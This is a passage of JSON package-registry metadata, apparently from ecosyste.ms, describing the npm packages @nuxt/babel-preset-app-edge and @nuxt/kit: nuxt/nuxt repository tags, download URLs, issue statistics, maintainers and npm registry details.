3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:57.547Z","dependent_packages_count":4,"downloads":28914,"downloads_period":"last-month","dependent_repos_count":425,"rankings":{"downloads":1.10362138111966,"dependent_repos_count":0.8128823740234078,"dependent_packages_count":4.506936399663058,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":1.8105650152087687,"average":1.485483132838196},"purl":"pkg:npm/%40nuxt/babel-preset-app-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/babel-preset-app-edge","docker_dependents_count":1,"docker_downloads_count":8,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/babel-preset-app-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/babel-preset-app-edge/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fbabel-preset-app-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-11T21:32:16.502Z","updated_at":"2026-02-11T21:32:16.502Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-12T21:18:45.183Z","updated_at":"2023-12-12T21:18:45.183Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096105,"name":"@nuxt/kit","ecosystem":"npm","description":"Toolkit for authoring modules and interacting with Nuxt","homepage":"https://nuxt.com/docs/4.x/api/kit","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":139,"first_release_published_at":"2021-04-04T15:52:31.634Z","latest_release_published_at":"2026-05-10T23:50:25.242Z","latest_release_number":"4.4.5","last_synced_at":"2026-05-11T19:32:01.797Z","created_at":"2022-04-08T10:39:26.966Z","updated_at":"2026-05-11T19:32:01.797Z","registry_url":"https://www.npmjs.com/package/@nuxt/kit","install_command":"npm install @nuxt/kit","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"4.0.0-alpha.4","rc":"4.0.0-rc.0","4x":"4.4.1","latest":"4.4.5","3x":"3.21.5"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221370872,"owners_count":16806934,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"